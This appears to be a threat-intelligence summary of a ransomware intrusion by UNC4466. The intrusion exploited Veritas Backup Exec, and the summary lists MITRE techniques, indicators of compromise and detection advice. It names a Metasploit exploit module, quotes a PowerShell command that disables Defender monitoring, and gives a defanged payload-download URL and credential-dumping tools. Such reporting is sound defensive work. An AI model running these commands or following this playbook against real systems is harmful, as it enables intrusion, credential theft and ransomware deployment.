Keypoints
- UNC4466 exploited internet-accessible Veritas Backup Exec (pre-21.2) using a Metasploit module to achieve initial access.
- The actor used Metasploit persistence and modifications to domain policy to maintain footholds and execute payloads across the network.
- Internal reconnaissance included Advanced IP Scanner and ADRecon to enumerate hosts, accounts, and AD configuration.
- Ingress of additional tools leveraged BITS (Start-BitsTransfer) to download LAZAGNE, LIGOLO, REVSOCKS, WINSW, RCLONE and the ALPHV encryptor.
- Credential access relied on Mimikatz (MemSSP), LaZagne, and Nanodump to collect clear-text credentials and LSASS memory dumps.
- Command-and-control used SOCKS5 tunneling (LIGOLO, REVSOCKS); defense evasion included clearing logs and disabling Defender via Set-MpPreference.
- Mandiant recommends prioritizing detection of internet-exposed Backup Exec instances, forwarding Backup Exec logs to SIEMs, and monitoring suspicious BITS and pre/post-job commands.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – UNC4466 used a Metasploit module to exploit Veritas Backup Exec for initial access (‘In late 2022, UNC4466 gained access to an internet-exposed Windows server, running Veritas Backup Exec version 21.0 using the Metasploit module `exploit/multi/veritas/beagent_sha_auth_rce`.’)
- [T1547] Boot or Logon Autostart Execution – Persistence was established via Metasploit persistence mechanisms and creation/modification of run keys (‘the Metasploit persistence module was invoked to maintain persistent access to the system for the remainder of this intrusion.’ / ‘Modification of Registry run keys’)
- [T1105] Ingress Tool Transfer – BITS (Start-BitsTransfer) was used to download tooling and payloads into staging directories (‘made heavy use of the Background Intelligent Transfer Service (BITS) to download additional tools such as LAZAGNE, LIGOLO, WINSW, RCLONE, and finally the ALPHV ransomware encryptor.’)
- [T1090] Proxy/Tunneling – SOCKS5 tunneling (LIGOLO, REVSOCKS) provided C2 connectivity and relay through compromised hosts (‘UNC4466 leveraged SOCKS5 tunneling to communicate with compromised systems in the victim network. … Two separate tools were deployed … LIGOLO and REVSOCKS.’)
- [T1003.001] OS Credential Dumping: LSASS Memory – Credential dumping via Mimikatz (MemSSP) and Nanodump captured clear-text credentials and LSASS memory (‘The threat actor utilized multiple credential access tools, including Mimikatz, LaZagne and Nanodump to gather clear-text credentials and credential material.’ / ‘MIMIKATZ Security Support Provider injection module (`MISC::MemSSP`).’)
- [T1070.001] Clear Windows Event Logs – The actor cleared event logs as part of evasion (‘Apart from clearing event logs, UNC4466 also used the built in Set-MpPrefernce cmdlet to disable Microsoft Defender’s real-time monitoring capability.’)
- [T1562.001] Disable or Modify Security Tools – Microsoft Defender real-time monitoring was disabled via Set-MpPreference PowerShell cmdlet (‘powershell.exe Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue’)
- [T1484] Domain Policy Modification – Immediate tasks were added to the default domain policy to disable security, download, and run the encryptor (‘UNC4466 added immediate tasks to the default domain policy. These tasks were configured to perform actions which disabled security software, downloaded the ALPHV encryptor, then execute it.’)
Indicators of Compromise
- [File hashes] Tool and payload hashes observed – ee6e0cb1b3b7601696e9a05ce66e7f37 (ALPHV), da202cc4b3679fdb47003d603a93c90d (MIMIKATZ), and multiple other hashes reported.
- [IP addresses] C2 and staging hosts – 45[.]61[.]138[.]109, 185[.]141[.]62[.]123 (multiple ports and URLs observed), plus additional IPs listed.
- [URLs/domains] Download locations and staging URLs – hxxps://download.advanced-ip-scanner[.]com, hxxp://185[.]141[.]62[.]123:10228/update[.]exe, and GitHub repositories used for LIGOLO/REVSOCKS.
- [File names/paths] Staging and artifact paths – C:ProgramData (staging), C:WindowsTemp[random].exe (downloaded executables), C:WindowsSystem32mimilsa.log (Mimikatz MemSSP output).
UNC4466 exploited internet-accessible Veritas Backup Exec (vulnerable versions prior to 21.2) using a publicly available Metasploit module to gain initial access and then invoked Metasploit persistence to maintain a foothold. After initial compromise, the actor conducted internal discovery with Advanced IP Scanner to map hosts and ADRecon to enumerate Active Directory, accounts, trusts, and group/policy information.
For lateral movement and staging, the threat actor heavily used BITS (Start-BitsTransfer) to download tooling into C:ProgramData and other staging locations, pulling LAZAGNE, LIGOLO, REVSOCKS, WINSW, RCLONE and ultimately the ALPHV encryptor. C2 was implemented via SOCKS5 tunneling using LIGOLO and REVSOCKS to proxy communications through compromised hosts; credential access was achieved with Mimikatz (MemSSP), LaZagne and Nanodump to capture clear-text credentials and LSASS memory dumps.
Defense-evasion included clearing event logs and disabling Microsoft Defender real-time monitoring via Set-MpPreference. The actor also modified domain-level policies by adding immediate tasks to disable security, download the encryptor, and execute it across the environment. Detection opportunities include forwarding Backup Exec logs to SIEMs to flag unexpected remote connections and suspicious pre/post-job commands, monitoring for anomalous BITS transfers and new executables in staging directories, and watching for LSASS dumps and changes to Defender settings.
Read more: https://www.mandiant.com/resources/blog/alphv-ransomware-backup